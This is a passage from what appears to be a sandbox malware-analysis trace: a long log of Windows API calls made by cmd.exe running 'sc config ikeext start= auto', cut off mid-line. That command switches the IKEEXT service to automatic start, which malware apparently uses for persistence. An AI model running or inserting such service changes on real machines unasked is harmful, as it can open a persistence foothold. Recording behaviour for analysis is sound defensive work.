"pagefile_0x00000000004b0000" filename = "" Region: id = 1251 start_va = 0x6a0000 end_va = 0x129ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1252 start_va = 0x12a0000 end_va = 0x1402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 1253 start_va = 0x1410000 end_va = 0x16defff entry_point = 0x1410000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 52 os_tid = 0xc04 [0048.465] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afc0c | out: lpSystemTimeAsFileTime=0x2afc0c*(dwLowDateTime=0x4e289d40, dwHighDateTime=0x1d34280)) [0048.465] GetCurrentProcessId () returned 0xc00 [0048.465] GetCurrentThreadId () returned 0xc04 [0048.465] GetTickCount () returned 0x13e95 [0048.465] QueryPerformanceCounter (in: lpPerformanceCount=0x2afc04 | out: lpPerformanceCount=0x2afc04*=317834572) returned 1 [0048.466] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0048.466] __set_app_type (_Type=0x1) [0048.466] __p__fmode () returned 0x768231f4 [0048.467] __p__commode () returned 0x768231fc [0048.467] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0048.467] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0048.467] GetCurrentThreadId () returned 0xc04 [0048.467] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc04) returned 0x38 [0048.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.467] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0048.467] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.467] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.467] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afb9c | out: phkResult=0x2afb9c*=0x0) returned 0x2 [0048.467] VirtualQuery (in: lpAddress=0x2afbd3, lpBuffer=0x2afb6c, dwLength=0x1c | out: lpBuffer=0x2afb6c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.467] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afb6c, dwLength=0x1c | out: lpBuffer=0x2afb6c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0048.467] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afb6c, dwLength=0x1c | out: lpBuffer=0x2afb6c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0048.467] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afb6c, dwLength=0x1c | out: lpBuffer=0x2afb6c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.468] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afb6c, dwLength=0x1c | out: lpBuffer=0x2afb6c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.468] GetConsoleOutputCP () returned 0x1b5 [0048.468] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.468] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0048.468] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.468] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0048.468] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.468] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.468] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.468] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.468] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.468] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.468] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.468] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0048.469] GetEnvironmentStringsW () returned 0x3c00f0* [0048.469] FreeEnvironmentStringsW (penv=0x3c00f0) returned 1 [0048.469] GetEnvironmentStringsW () returned 0x3c00f0* [0048.469] FreeEnvironmentStringsW (penv=0x3c00f0) returned 1 [0048.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeb0c | out: phkResult=0x2aeb0c*=0x40) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x0, lpData=0x2aeb18*=0xe8, lpcbData=0x2aeb10*=0x1000) returned 0x2 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x1, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x0, lpData=0x2aeb18*=0x1, lpcbData=0x2aeb10*=0x1000) returned 0x2 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x0, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x40, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x40, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x0, lpData=0x2aeb18*=0x40, lpcbData=0x2aeb10*=0x1000) returned 0x2 [0048.469] RegCloseKey (hKey=0x40) returned 0x0 [0048.469] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeb0c | out: phkResult=0x2aeb0c*=0x40) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x0, lpData=0x2aeb18*=0x40, lpcbData=0x2aeb10*=0x1000) returned 0x2 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x1, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x0, lpData=0x2aeb18*=0x1, lpcbData=0x2aeb10*=0x1000) returned 0x2 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x0, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x9, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x4, lpData=0x2aeb18*=0x9, lpcbData=0x2aeb10*=0x4) returned 0x0 [0048.469] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeb14, lpData=0x2aeb18, lpcbData=0x2aeb10*=0x1000 | out: lpType=0x2aeb14*=0x0, lpData=0x2aeb18*=0x9, lpcbData=0x2aeb10*=0x1000) returned 0x2 [0048.469] RegCloseKey (hKey=0x40) returned 0x0 [0048.470] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa0f [0048.470] srand (_Seed=0x59ddfa0f) [0048.470] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"" [0048.470] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"" [0048.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.470] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1940, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0048.470] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.470] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.470] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.470] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0048.470] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0048.470] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0048.470] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0048.470] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0048.470] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0048.470] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0048.470] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0048.470] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0048.470] GetEnvironmentStringsW () returned 0x3c2380* [0048.470] FreeEnvironmentStringsW (penv=0x3c2380) returned 1 [0048.470] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.470] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.470] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0048.471] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0048.471] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0048.471] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0048.471] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0048.471] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0048.471] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0048.471] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0048.471] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af8d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x2af8d8, lpFilePart=0x2af8d4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2af8d4*="system32") returned 0x13 [0048.471] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.471] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2af654 | out: lpFindFileData=0x2af654) returned 0x3c0920 [0048.471] FindClose (in: hFindFile=0x3c0920 | out: hFindFile=0x3c0920) returned 1 [0048.471] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2af654 | out: lpFindFileData=0x2af654) returned 0x3c0920 [0048.471] FindClose (in: hFindFile=0x3c0920 | out: hFindFile=0x3c0920) returned 1 [0048.471] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.471] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0048.471] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0048.471] GetEnvironmentStringsW () returned 0x3c00f0* [0048.472] FreeEnvironmentStringsW (penv=0x3c00f0) returned 1 [0048.472] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.473] _wcsnicmp (_String1="sc c", _String2="cmd ", _MaxCount=0x4) returned 16 [0048.473] SetErrorMode (uMode=0x0) returned 0x8001 [0048.473] SetErrorMode (uMode=0x1) returned 0x0 [0048.473] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b0850, lpFilePart=0x2af850 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2af850*="system32") returned 0x13 [0048.474] SetErrorMode (uMode=0x8001) returned 0x1 [0048.474] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.474] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.478] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc config ikeext start= auto.*", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.478] GetLastError () returned 0x2 [0048.478] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc config ikeext start= auto", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.479] GetLastError () returned 0x2 [0048.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc config ikeext start= auto.*", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.479] GetLastError () returned 0x2 [0048.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc config ikeext start= auto", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.479] GetLastError () returned 0x2 [0048.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\sc config ikeext start= auto.*", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.479] GetLastError () returned 0x2 [0048.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\sc config ikeext start= auto", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.479] GetLastError () returned 0x2 [0048.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\sc config ikeext start= auto.*", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.479] GetLastError () returned 0x2 [0048.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\sc config ikeext start= auto", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.480] GetLastError () returned 0x2 [0048.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\sc config ikeext start= auto.*", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.480] GetLastError () returned 0x2 [0048.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\sc config ikeext start= auto", fInfoLevelId=0x1, lpFindFileData=0x2af5cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af5cc) returned 0xffffffff [0048.480] GetLastError () returned 0x2 [0048.480] GetConsoleOutputCP () returned 0x1b5 [0048.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.480] GetUserDefaultLCID () returned 0x409 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afa18, cchData=128 | out: lpLCData="0") returned 2 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afa18, cchData=128 | out: lpLCData="0") returned 2 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afa18, cchData=128 | out: lpLCData="1") returned 2 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0048.481] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0048.481] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0048.482] GetConsoleTitleW (in: lpConsoleTitle=0x3b0b50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.482] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0048.482] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0048.482] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0048.483] GetConsoleTitleW (in: lpConsoleTitle=0x2af710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.484] SetErrorMode (uMode=0x0) returned 0x8001 [0048.484] SetErrorMode (uMode=0x1) returned 0x0 [0048.484] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c1d70, lpFilePart=0x2af230 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2af230*="system32") returned 0x13 [0048.484] SetErrorMode (uMode=0x8001) returned 0x1 [0048.484] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.484] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.484] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.484] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2aefac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aefac) returned 0x3b0f68 [0048.484] FindClose (in: hFindFile=0x3b0f68 | out: hFindFile=0x3b0f68) returned 1 [0048.485] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x2aefac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aefac) returned 0xffffffff [0048.485] GetLastError () returned 0x2 [0048.485] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aefac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aefac) returned 0x3b0f68 [0048.485] FindClose (in: hFindFile=0x3b0f68 | out: hFindFile=0x3b0f68) returned 1 [0048.485] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0048.485] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0048.485] GetConsoleTitleW (in: lpConsoleTitle=0x2af4a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.485] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af32c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af3f4 | out: lpAttributeList=0x2af32c, lpSize=0x2af3f4) returned 1 [0048.485] UpdateProcThreadAttribute (in: lpAttributeList=0x2af32c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af3ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af32c, lpPreviousValue=0x0) returned 1 [0048.485] GetStartupInfoW (in: lpStartupInfo=0x2af2e8 | out: lpStartupInfo=0x2af2e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.485] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.486] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.486] lstrcmpW (lpString1="\\sc.exe", 